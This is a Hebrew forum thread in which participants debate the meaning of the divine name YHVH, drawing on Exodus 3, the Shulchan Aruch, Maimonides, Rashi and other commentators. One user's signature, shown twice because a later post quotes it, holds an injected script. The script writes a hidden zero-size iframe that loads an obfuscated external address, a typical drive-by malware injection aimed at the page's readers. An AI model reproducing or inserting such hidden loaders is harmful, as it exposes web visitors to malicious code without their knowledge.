| נשלח ב-14/1/2012 23:43 |
|
| |
שם הוי"ה האם הוא מוכרח המציאות?
שם הוי"ה האם הוא מוכרח המציאות? כל אחד מאתנו מכיר את דברי השולחן ערוך באורח חיים סימן ה על כוונת ומשמעות שם הוי"ה, וזה לשונו: יכוין בברכות פירוש המלות. כשיזכיר השם, יכוין פירוש קריאתו באדנות שהוא אדון הכל, 'ויכוין בכתיבתו ביו"ד ה"א שהיה והוה ויהיה'. דברי השולחן ערוך מבוסס על ביאורי הראשונים במשמעות וכוונת שם הוי"ה. וכאן עומדת השאלה: האם באמת זה הכוונה של שם הוי"ה? אנחנו כל כך רגילים לכוונה הזאת ואנחנו לוקחים את זה כמובן מאליו, וכך כל סידור שמכבד את עצמו מביא את הכוונה הזאת. ברצוני כאן לברר האם אכן זה הכוונה, ובודאי האם זה מוכרח או מוסכם על כולם. המקור הראשוני לדעתי צריך להיות הפסוקים שבפרשת השבוע שהם הבסיס והמקור לשם הוי"ה, ואלו הם: שמות פרק ג (יג) וַיֹּאמֶר מֹשֶׁה אֶל הָאֱלֹהִים הִנֵּה אָנֹכִי בָא אֶל בְּנֵי יִשְׂרָאֵל וְאָמַרְתִּי לָהֶם אֱלֹהֵי אֲבוֹתֵיכֶם שְׁלָחַנִי אֲלֵיכֶם וְאָמְרוּ לִי מַה שְּׁמוֹ מָה אֹמַר אֲלֵהֶם: (יד) וַיֹּאמֶר אֱלֹהִים אֶל מֹשֶׁה אֶהְיֶה אֲשֶׁר אֶהְיֶה וַיֹּאמֶר כֹּה תֹאמַר לִבְנֵי יִשְׂרָאֵל אֶהְיֶה שְׁלָחַנִי אֲלֵיכֶם: (טו) וַיֹּאמֶר עוֹד אֱלֹהִים אֶל מֹשֶׁה כֹּה תֹאמַר אֶל בְּנֵי יִשְׂרָאֵל יְקֹוָק אֱלֹהֵי אֲבֹתֵיכֶם אֱלֹהֵי אַבְרָהָם אֱלֹהֵי יִצְחָק וֵאלֹהֵי יַעֲקֹב שְׁלָחַנִי אֲלֵיכֶם זֶה שְּׁמִי לְעֹלָם וְזֶה זִכְרִי לְדֹר דֹּר: (טז) לֵךְ וְאָסַפְתָּ אֶת זִקְנֵי יִשְׂרָאֵל וְאָמַרְתָּ אֲלֵהֶם יְקֹוָק אֱלֹהֵי אֲבֹתֵיכֶם נִרְאָה אֵלַי אֱלֹהֵי אַבְרָהָם יִצְחָק וְיַעֲקֹב לֵאמֹר פָּקֹד פָּקַדְתִּי אֶתְכֶם וְאֶת הֶעָשׂוּי לָכֶם בְּמִצְרָיִם: בהמשך אעלה את הדיונים והבירורים שצריך לדון בגוף הפסוקים כדי להגיע לבירור הכוונה, וכן את עיקרי השיטות ומה שיש לדון בהם כדי להגיע לבירור האמת. אשמח מאוד בשיתוף כל החברים. אני חושב שזהו נושא יסודי ושצריך לעניין כל יהודי המאמין בהוי"ה אלוהי ישראל.
 |
|
|
|
|
| נשלח ב-15/1/2012 00:08 |
|
| |
כדאי לך לעיין באבן עזרא בעניין בשמות,
אם תרצה עזרה בלהבין אותו אז כדאי לעיין בהקדמה של הרב וויזר לפירוש של האבן עזרא (מוסד הרב קוק)
שם הוא מסביר את כל השיטה שלו בעניין,
|
|
|
|
| נשלח ב-15/1/2012 00:19 |
|
| |
מקס היקר, אני כמובן למדתי את שיטתו של הרב 'אבן עזרא', וגם אביא את עיקרי שיטתו בהמשך, פה ברצוני לברר את הדברים עד הסוף עד כמה שאפשר ללא דעות קדומות. כמובן שאפשר וצריך להיעזר בדברי הקדמונים.
|
|
|
|
| נשלח ב-15/1/2012 00:56 |
|
| |
מה קשור דעות קודמות ? להחכים זה לא דעות קודמות,
(דעות קודמות = דעות סגורות. שאין לערר עליהם,)
|
|
|
|
| נשלח ב-15/1/2012 10:35 |
|
| |
וכמובן גם ברשב"ם במקום.
|
|
|
|
| נשלח ב-15/1/2012 11:49 |
|
| |
צבי לא הבנתי הרי בפסוקים שהבאת לא מופיע יה וה. מה שכן מופיע זי שם ה' הוא אהיה אשר אהיה- זה שמו. בכל מקרה בפסוק הזה בו ה' מציג את עצמו למשה, ומצווה אותו כי את השם אהיה אשר אהיה- זה שמי לעולם- ימסור לבני ישראל. תבין סוד זה של אהיה אשר אהיה- וארמוז לך ברמז -וכל מאמינים כי הוא דיין אמת ההגוי באהיה אשר אהיה.
|
|
|
|
| נשלח ב-15/1/2012 12:28 |
|
| |
ירוחם, כנראה כוונתך לגימטריא של אהיה-21 אשר-פעמים אהיה-21=אמת-441 עם הכולל. ולגוף הערתך: ודאי שכתוב עיין פסוק טו-טז, וזה לשונם:
(טו) וַיֹּאמֶר עוֹד אֱלֹהִים אֶל מֹשֶׁה כֹּה תֹאמַר אֶל בְּנֵי יִשְׂרָאֵל יְקֹוָק אֱלֹהֵי אֲבֹתֵיכֶם אֱלֹהֵי אַבְרָהָם אֱלֹהֵי יִצְחָק וֵאלֹהֵי יַעֲקֹב שְׁלָחַנִי אֲלֵיכֶם זֶה שְּׁמִי לְעֹלָם וְזֶה זִכְרִי לְדֹר דֹּר:
(טז) לֵךְ וְאָסַפְתָּ אֶת זִקְנֵי יִשְׂרָאֵל וְאָמַרְתָּ אֲלֵהֶם יְקֹוָק אֱלֹהֵי אֲבֹתֵיכֶם נִרְאָה אֵלַי אֱלֹהֵי אַבְרָהָם יִצְחָק וְיַעֲקֹב לֵאמֹר פָּקֹד פָּקַדְתִּי אֶתְכֶם וְאֶת הֶעָשׂוּי לָכֶם בְּמִצְרָיִם:
|
|
|
|
| נשלח ב-15/1/2012 12:37 |
|
| |
אבל הוא לא אמר למשה שכך -בשם הזה- הוא יציג אותו לבני ישראל. הרי מדובר כאן עלינו איזה שם אנחנו צריכים לדעת.
להבדיל אלפי הבדלות- בצבא המפקד אומר לחיילים -שמי כך וכך- אבל אתם תיקראו לי המפקד!
|
|
|
|
|
| נשלח ב-15/1/2012 17:03 |
|
| |
כמדומה שנושא זה עלה לפחות פעם אחת בפורום. אני מציין זאת לא בגלל שאין ראוי לפתוח אשכול. לדעתי כן. אלא ששם ציטטתי כמדומה מתוך הספר "רומא וירושלים" של הס, שבו דן בנושא זה, והופתעתי לגלות את דבריו. ואם ימצא אי מי את הדברים ראוי להביאם לכאן.
לגבי עצם הדיון -
האם יש חשיבות לשם? איך נקבעים שמות? האם שם של אלוקים אמור להיות שונה?
*** לגבי "מוכרח המציאות" -
כמדומה שמונח זה הוא פרי יצירת הרמב"ם בעקבות הפילוסופיה שלו. וזה מזכיר ביותר ממשהו את ההוכחה האונטולוגית למציאות האלקים. האלקים הוא זה אשר "מציאות" היא אחד המאפיינים של מהותו.
הסבר קצרצר: כל דבר בעולם אפשר שיהיה ואפשר שלא יהיה. גם מה שנמצא, כגון אני הכותב, את/ה הקורא/ת, המחשב שלי, המחשב שלך, ועוד ועוד, כל מה שבכדור הארץ ובגלקסיות, יכול היה להיות אחרת.
הביטוי "יכול היה להיות אחרת" הוא אמנם לא פשוט כפי שהוא נראה אבל רובנו מבינים אותו אינטואיטיבית וסבורים שיש בו ממש. ואדרבה, זו שאלה גדולה: מדוע אנו כאן? מדוע יש משהו במקום לא כלום?
לפי שלכל דבר בעולם יש מהות ומאפיינים, ואפשר שיתקיימו ואפשר שלא. אני לא הייתי לפני שנבראתי ונולדתי. אין מציאותי מוכרחת.
אולם לגבי ה' יש אומרים שמציאותו מוכרחת, ולכן מעצם מושגו מוכרח קיומו.
יש לערער על הוכחה זו, וגם הרמב"ם אינו משתמש בה ממש בצורה זו, אבל הוא עדיין כותב שיש תלות של העולם בה' ואין תלות הפוכה של ה' בעולם.
יכול היה שלא להיות עולם ועדיין היה השם. אלא שאם לא היה השם (וזו כמסתבר סתירה מושגית או לוגית) אז לא יכול היה להיות עולם.
מכאן הכינוי לה' - מוכרח המציאות או "מחוייב המציאות".
כיון שמשה רבנו ועם ישראל ברוב הדורות, כולל הרבנים והנביאים, לא ידעו פילוסופיה (גם אם הרמב"ם האמין בזה) וכיון שהכרתם את האלקים, גם אם היתה בהירה, חכמה, אינטואיטיבית, אולי מיסטית, שלא כמו שלי, עדיין לא יכלו להכיר את המונח "מחוייב המציאות" וגם לא להכיר מונח מקביל לו.
לפיכך שום שם של האלקים שמופיע במקרא אינו יכול להיות נושא משמעות זו של "מחוייב המציאות" במובן שבארתי כאן.
אמנם, לאחר שאנו מבינים את הרעיון, כמדומה שאי אפשר להשתמט מזה שהוא נכון (יש גיל שבו מגלים ששתיים ועוד שתיים הן ארבע, אבל ברגע שמגלים יודעים שתמיד היה כך גם לפני שגילינו זאת).
האם זה מה שיש לייחס כמובן לשם ה' זה או אחר? יש לדון.
תוקנה טעות הקלדה
שומר פיו ולשונו - שומר מצרות נפשו
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>
תוקן על ידי מיימוני ב- 15/01/2012 17:05:01
 |
|
|
|
|
| נשלח ב-15/1/2012 18:52 |
|
| |
תסלחו לי שאני לא כ"כ מבין את השאלה. לאל היהודי קוראים י-הוה. איך רצית שיתייחסו אליו? יכחכחו ג' פעמים בגרון? יצקצקו עם הלשון לכיוון דרום מזרח? גם מגישה תיאולוגית מאוד מופשטת זה בערך הדבר שאפשר לומר עליו: שהוא הווה. שהוא ההווייה. (וע"ע און זית)
|
|
|
|
| נשלח ב-15/1/2012 19:21 |
|
| |
נוכח כדבריך שם ה' הוא לשון הוה. כֹּה תֹאמַר אֶל בְּנֵי יִשְׂרָאֵל יְקֹוָק אֱלֹהֵי אֲבֹתֵיכֶם אֱלֹהֵי אַבְרָהָם אֱלֹהֵי יִצְחָק וֵאלֹהֵי יַעֲקֹב שְׁלָחַנִי אֲלֵיכֶם זֶה שְּׁמִי לְעֹלָם וְזֶה זִכְרִי לְדֹר הפסוק מציין בפרוש אלוקי האבות, כלומר המנהיג השופט. אלוקים = מנהיג דיין וכד' יה-- וה = לשון הוה לשון הויה, -אני היתי ההויה שלהם. ההויה הפרטית שלהם-.
קשה אבל להבין אולי אחרת- העובדה שאלוקים הוא בעצם לא רק של האבות- הוא אלוקי כל העולם, ולא רק של היהודים. אלא הוא היה ונמצאה בהויתם של עם ישראל בכל אופן אז.. אבל אז ה' נמצא נגרע שהוא רק של עם ישראל.=
|
|
|
|
| נשלח ב-15/1/2012 22:23 |
|
| |
צבי, השבוע חשבתי שהפסוקים של פרשתינו אכן נותנים מבט ראוי למובן של שם הוי"ה כמשמעות של היה הווה ויהיה, באשר כל הנושא הנידון בפתיחת הפרשה , מגיע על רקע כשלון תפיסת הא-ל המתגלה במציאות ההווה שהרי גם משה (ובודאי בני ישראל) לא מצליחים במצב הקשה של ההווה המתקיים במצרים למצוא מוצא למצב, ואז מוציא הקב"ה את שם הוי"ה אל פועל המציאות (או לחילופין אל התודעה/נבואה של משה רבינו) ומגלה לו שגאולת מצרים לא מגיעה מצד ההווה , אלא כחלק ממבט כולל שמתחיל באבות וצופה אל העתיד אליו הקב"ה מייעד את בני ישראל , ובהתאם לכל זה מתרחש גם ההווה לכל הפחות בהקשר של יציאת מצרים (ולהבנתי גם בכלל).
|
|
|
|
| נשלח ב-15/1/2012 23:35 |
|
| |
| מיימוני כתב: |  | כמדומה שנושא זה עלה לפחות פעם אחת בפורום. אני מציין זאת לא בגלל שאין ראוי לפתוח אשכול. לדעתי כן. אלא ששם ציטטתי כמדומה מתוך הספר "רומא וירושלים" של הס, שבו דן בנושא זה, והופתעתי לגלות את דבריו. ואם ימצא אי מי את הדברים ראוי להביאם לכאן.
לגבי עצם הדיון -
האם יש חשיבות לשם? איך נקבעים שמות? האם שם של אלוקים אמור להיות שונה?
לא הבנתי את השאלה, אם רואים שמשה רבינו שואל ואמרו לי מה שמו והקב"ה עונה לו, וכן בריש פרשת וארא על שם 'אל שדי' שרק בו נראה ונודע לאבות לעומת שם 'הוי"ה' שבו הוא נגלה למשה, הרי שעניין השם הוא מאוד מרכזי.
לגבי "מוכרח המציאות" -
כמדומה שמונח זה הוא פרי יצירת הרמב"ם בעקבות הפילוסופיה שלו. וזה מזכיר ביותר ממשהו את ההוכחה האונטולוגית למציאות האלקים. האלקים הוא זה אשר "מציאות" היא אחד המאפיינים של מהותו.
הסבר קצרצר: כל דבר בעולם אפשר שיהיה ואפשר שלא יהיה. גם מה שנמצא, כגון אני הכותב, את/ה הקורא/ת, המחשב שלי, המחשב שלך, ועוד ועוד, כל מה שבכדור הארץ ובגלקסיות, יכול היה להיות אחרת.
הביטוי "יכול היה להיות אחרת" הוא אמנם לא פשוט כפי שהוא נראה אבל רובנו מבינים אותו אינטואיטיבית וסבורים שיש בו ממש. ואדרבה, זו שאלה גדולה: מדוע אנו כאן? מדוע יש משהו במקום לא כלום?
לפי שלכל דבר בעולם יש מהות ומאפיינים, ואפשר שיתקיימו ואפשר שלא. אני לא הייתי לפני שנבראתי ונולדתי. אין מציאותי מוכרחת.
אולם לגבי ה' יש אומרים שמציאותו מוכרחת, ולכן מעצם מושגו מוכרח קיומו.
יש לערער על הוכחה זו, וגם הרמב"ם אינו משתמש בה ממש בצורה זו, אבל הוא עדיין כותב שיש תלות של העולם בה' ואין תלות הפוכה של ה' בעולם.
יכול היה שלא להיות עולם ועדיין היה השם. אלא שאם לא היה השם (וזו כמסתבר סתירה מושגית או לוגית) אז לא יכול היה להיות עולם.
מכאן הכינוי לה' - מוכרח המציאות או "מחוייב המציאות".
אני רואה ברמב"ם שהכינו או הביטוי ' מוכרח המציאות' הוא יותר פשוט.
וזה לשון הרמב"ם ב מורה הנבוכים חלק א פרק נז אמנם מי שאין סבה למציאותו, והוא השם יתעלה ויתרומם לבדו, כי זה הוא ענין אמרנו עליו יתברך שהוא מחויב המציאות,
והיינו שכיוון שהיה לעולמים ויהיה לעולמים הרי שאין סיבה למציאותו, וטעם שהוא נמצא לפי שהוא נמצא, וזהו עניין מוכרח המציאות.
והעיקר בזה שסיבה צריך להיות לדבר שנוצר, ואילו דבר שהיה ויהיה תמיד אין שום צורך לחפש סיבה למציאותו, ובאמת אין סיבה.
כיון שמשה רבנו ועם ישראל ברוב הדורות, כולל הרבנים והנביאים, לא ידעו פילוסופיה (גם אם הרמב"ם האמין בזה) וכיון שהכרתם את האלקים, גם אם היתה בהירה, חכמה, אינטואיטיבית, אולי מיסטית, שלא כמו שלי, עדיין לא יכלו להכיר את המונח "מחוייב המציאות" וגם לא להכיר מונח מקביל לו.
לפיכך שום שם של האלקים שמופיע במקרא אינו יכול להיות נושא משמעות זו של "מחוייב המציאות" במובן שבארתי כאן.
לדרכי המונח הרבה יותר פשוט כך שגם אם לא יכלו לדעת את המונח בסגנון הזה, הרי שאת את הרעיון שלו ברור שיכלו לדעת שהוא רעיון מאוד פשוט.לגופו של עניין אני בהחלט מסכים שזה לא פשט הדברים, ולו בגלל שזה לא היה נושא שמעסיק את הקדמונים שלפני הפילוסופים השייכים לאסכולת יון והנמשכים אחריהם. חוץ ממה שלפי עניות דעתי אין זה פשט המקראות ועל כך בהמשך.
אמנם, לאחר שאנו מבינים את הרעיון, כמדומה שאי אפשר להשתמט מזה שהוא נכון (יש גיל שבו מגלים ששתיים ועוד שתיים הן ארבע, אבל ברגע שמגלים יודעים שתמיד היה כך גם לפני שגילינו זאת).
האם זה מה שיש לייחס כמובן לשם ה' זה או אחר? יש לדון.
תוקנה טעות הקלדה
שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");
תוקן על ידי מיימוני ב- 15/01/2012 17:05:01 |
|
 |
|
|
|
|
| נשלח ב-16/1/2012 09:31 |
|
| |
צבי
אכן יש לברר מה בדיוק ביקש משה מה'.
יתכן, ויש לבדוק זאת בזהירות, שהשאלה לא היתה על "השם הנכון" אלא על זהות.
אבהיר על ידי דוגמא:
נניח שאני שואל מהו "שולחן", "TABLE", "TISCH, וכו'. התשובה היא בדרך כלל שזה אותו דבר, רק בשפות שונות.
וזו גם התשובה לשאלה: מה השם הנכון של החפץ הזה.
מה הנמשל?
שולחנות יש רבים ואלוקים יש רק אחד. אבל העמים בתקופה ההיא האמינו כל אחד באליליו. שאלה סבירה היא אם כן אל הנביא: בשם מי אתה מדבר עמנו? בשם אלוקי אברהם, יצחק ויעקב? האם הוא לא נותר מאחור, בארץ כנען?
נכון שיוסף הזכיר שם אלוקים ונראה שאשת פוטיפר הבינה את דבריו, אבל אולי עם ישראל בימי משה לא ידעו אפילו דבר פשוט כל כך, שיש אלוקים אחד והוא אלוקי אבותיהם. ואולי בעצם זה לא כל כך פשוט.
לפי זה, השאלה אינה על מהותו של ה' (שעל זה אין תשובה אלא שלילה פילוסופית או הצהרה על תארי הפעולה שלו, כולל אהבתו לנו ואהבתו לצדק) וגם לא על שם מסויים (ובודאי שאין כאן גישה מאגית, כלומר ששליטה בשם היא שליטה בכוחות אלו ואחרים). אלא שאלה של שפה והתייחסות. כיצד פונים לעם כדי לספר לו על אלוקים בשעה שאין מילים מספיק מתאימות למטרה הזו.
ולפי זה יפו דברי רש"י על פי המדרש. "אהיה אשר אהיה", אני שעמם בשיעבוד זה ואני שאהיה איתם (עם האדם) בכל שיעבוד שהוא. ולכן גם כאילו חזר בו השם לאחר הערת משה שלשמוע שה' יהיה איתם תמיד, גם בצרות אחרות, מזכיר להם שיהיו צרות אחרות. ולמרות שזו מהותו של האדם, לא תמיד יש כוח לשמוע על זה, ועדיף לספר רק על הגאולה מהצרה הנוכחית ולא להתעסק בעתיד רחוק. ולכן ה' קיצר ואמר לו: אמור להם "אהיה", אלוקי אבותיכם שמשגיח וגואל אתכם, הוא שלח את משה אליכם.
לפי זה, אף השם בן ארבע אותיות, אם הוא אכן בא מלשון נסתר (גוף שלישי) של "אהיה", אומר רק את הדבר הזה, והוא מבוסס על תשובת ה' למשה לפי צרת ישראל באותו זמן. וכל מה שנקשר מסביבו מאוחר יותר הוא פרשנות, ולא תמיד נכונה.
|
|
|
|
| נשלח ב-16/1/2012 12:38 |
|
| |
גוף נסתר של אהיה הוא יהיה.ולכן כאשר האות השלישית מתחלפת לו' המשמעות משתנה.
|
|
|
|
| נשלח ב-16/1/2012 18:11 |
|
| |
זכור לי שבביאור הגר"א כתב שהביאור הוא "נמצא וקיים", ולא "היה הוה ויהיה" כהשו"ע. לכאורה היה נראה לי ששם ה' כשהוא קורא לעצמו (גוף ראשון) זה "אהיה". ["...אֶהְיֶה אֲשֶׁר אֶהְיֶה. וַיֹּאמֶר כֹּה תֹאמַר לִבְנֵי יִשְׂרָאֵל אֶהְיֶה שְׁלָחַנִי אֲלֵיכֶם" - פי', שמי "אהיה" כי אהיה תמיד] כשאנו אומרים את שמו, איננו אומרים "אהיה" אלא "יהיה", אך כדי לא להשתמש במילת חול כל-כך שכיחה, י התחלפה ל- ו, ונהיה "יהו-ה".
אם כך, פירוש שמו זה "יהיה תמיד"/"אשר יהיה".
קושיא על זה: אם כדברי, הניקוד היה צריך להיות 'יִהְוֶ-ה' כמו 'יִהְיֶה'. אך לכאורה הניקוד הוא או 'יָהוּ -ה' (ה אחרונה נחה), כמו בשמות: יְשַׁעְיָהוּ,יִרְמְיָהוּ,צִדְקִיָּהוּ,וכו' או 'יְהוֹ -ה' (ה אחרונה נחה), כמו בשמות: יְהוֹיָקִים,יְהוֹשָׁפָט,וכו' (כמובן בשמות אלו הכוונה היא לה') מקוה שמישהו הבקי בתנועות בעיברית העתיקה יעזור לי. אולי אם חולם זה OW (כשיטת הרב המבורגר) ושורוק זה UW, אז זה די דומה.
תוקן על ידי פינגווינאי ב- 16/01/2012 18:20:39
|
|
|
|
|